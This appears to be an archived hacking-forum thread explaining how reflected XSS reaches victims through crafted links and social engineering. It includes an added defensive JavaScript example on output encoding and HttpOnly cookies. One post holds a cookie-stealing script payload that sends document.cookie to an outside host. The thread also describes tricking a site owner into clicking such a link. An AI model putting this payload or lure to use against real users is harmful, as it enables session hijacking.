[beginner] Non-Persistent XSS

Discuss the many weaknesses of browser security and ways to mitigate the threat

Post by ibdwnm on Thu Apr 28, 2011 10:26 am

Hi,
I don't understand how to exploit non-persistent XSS; everywhere I read this cookie-logger thing, for example on this page:
http://hbay.netii.net/Webs.pdf
"In the next section we’ll talk about creating a cookie logger so we can steal session cookies and successfully get some user and/or admin privileges!"
But how is the user supposed to get his cookies logged? It isn't permanent, I can only get mine logged :P
I don't get how it can be possible in non-persistent XSS...
Thank you :D


Re: [beginner] Non-Persistent XSS

Post by tucak on Thu Apr 28, 2011 11:14 am

You need to trick him into visiting your link.


Re: [beginner] Non-Persistent XSS

Post by ibdwnm on Thu Apr 28, 2011 11:26 am

But how am I supposed to trick someone using non-persistent XSS? I could tell him "go to that page, it's cool", but it has got nothing to do with XSS? GMX's registration page is vulnerable; but copying something like "<script>document.location="http://mypage.com/documents.php?c="+document.cookie;</script>"
is bull; it gets executed, but no one is affected by it. What has the page being vulnerable to do with tricking someone?
I think I've got something fundamental wrong...


Re: [beginner] Non-Persistent XSS

Post by jgreen45 on Thu Apr 28, 2011 2:09 pm

I think that example might help. I remember someone came here to HTS and asked for people to pen test his site. When Goatboy inevitably 1337 h4x0red his website he found a non-persistent XSS exploit, and tricked (but for a good reason) the OP into clicking his link through social engineering. Goatboy got an admin cookie and alerted the OP, who then fixed the problem.

The post
Last edited by jgreen45 on Fri Apr 29, 2011 6:51 am, edited 1 time in total.
I can't come to bed...
Someone is WRONG on the internet


http://xkcd.com/386/
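
Added example, not part of any post in this thread: a minimal sketch of why a reflected parameter affects whoever opens the link, next to the two fixes that address it (encoding the reflected value, and marking the session cookie HttpOnly). The function names, the site.example URL and the cookie values are all constructed for illustration.

```javascript
// Added example; every name, URL and cookie value here is constructed.

// Encode the characters that let reflected text become markup.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Pull the reflected parameter out of the link the visitor opened.
function nameFromLink(link) {
  return new URL(link).searchParams.get('name') || '';
}

// Vulnerable: the parameter is copied into the response unchanged, so markup
// carried in the link becomes markup in the page of whoever follows the link.
function renderVulnerable(link) {
  return `<p>Hello ${nameFromLink(link)}, please register.</p>`;
}

// Hardened: the same page with the reflected value encoded for HTML context.
function renderHardened(link) {
  return `<p>Hello ${escapeHtml(nameFromLink(link))}, please register.</p>`;
}

// Models what document.cookie exposes to page script: cookies whose
// Set-Cookie header carries the HttpOnly attribute are left out.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !h.split(';').slice(1).some((a) => a.trim().toLowerCase() === 'httponly'))
    .map((h) => h.split(';')[0].trim())
    .join('; ');
}

// Constructed sample input: a link with markup in the reflected parameter.
const SAMPLE_LINK = 'https://site.example/register?name=' +
  encodeURIComponent('<script>alert(1)</script>');
const WEAK_COOKIES = ['sid=abc123; Path=/', 'theme=dark; Path=/'];
const HARDENED_COOKIES = ['sid=abc123; Path=/; HttpOnly; Secure; SameSite=Lax', 'theme=dark; Path=/'];

console.log(renderVulnerable(SAMPLE_LINK));          // script tag survives
console.log(renderHardened(SAMPLE_LINK));            // script tag is inert text
console.log(scriptVisibleCookies(WEAK_COOKIES));     // session id readable by script
console.log(scriptVisibleCookies(HARDENED_COOKIES)); // session id hidden from script
```

Encoding the output removes the injection itself; HttpOnly only limits what an injected script could read, so it is a second layer and not a replacement for the encoding.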


Re: [beginner] Non-Persistent XSS

Post by ibdwnm on Thu Apr 28, 2011 4:59 pm

I get it, thanks :D


Re: [beginner] Non-Persistent XSS

Post by Reason7194 on Thu May 05, 2011 12:20 pm

jgreen, I remember that. Goatboy, using his 1337 skillz, posted the pics of 'himself' in the admin edit area and OP was like "O_O". Being nice and all, Goatboy told him how to fix it and how he got into the admin area. Shit got cash in that thread.
I study Gotafu.


Re: [beginner] Non-Persistent XSS

Post by Goatboy on Thu May 05, 2011 2:06 pm

Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk


Re: [beginner] Non-Persistent XSS

Post by Reason7194 on Thu May 05, 2011 4:12 pm

Did you mean to write "herp" and "derp" in that link?
I study Gotafu.


Re: [beginner] Non-Persistent XSS

Post by Goatboy on Thu May 05, 2011 4:24 pm

Very much so. Needed to make it look like I was just putting test values. I use herp and derp in place of foo and bar.
Assume that everything I say is or could be a lie.
1UHQ15HqBRZFykqx7mKHpYroxanLjJcUk


Re: [beginner] Non-Persistent XSS

Post by Dwere134 on Tue May 10, 2011 11:03 am

Goatboy wrote: Very much so. Needed to make it look like I was just putting test values. I use herp and derp in place of foo and bar.

Why not fu and bar?
At any rate, does that cookie stealer steal only his cookies, or anyone who clicks on them?
Dwere (David)
Goatboy wrote:
Dwere wrote:I'm not one to start some branch of religion though. Not my thing.

Of course if you wanted to, you could call it the Davidians!

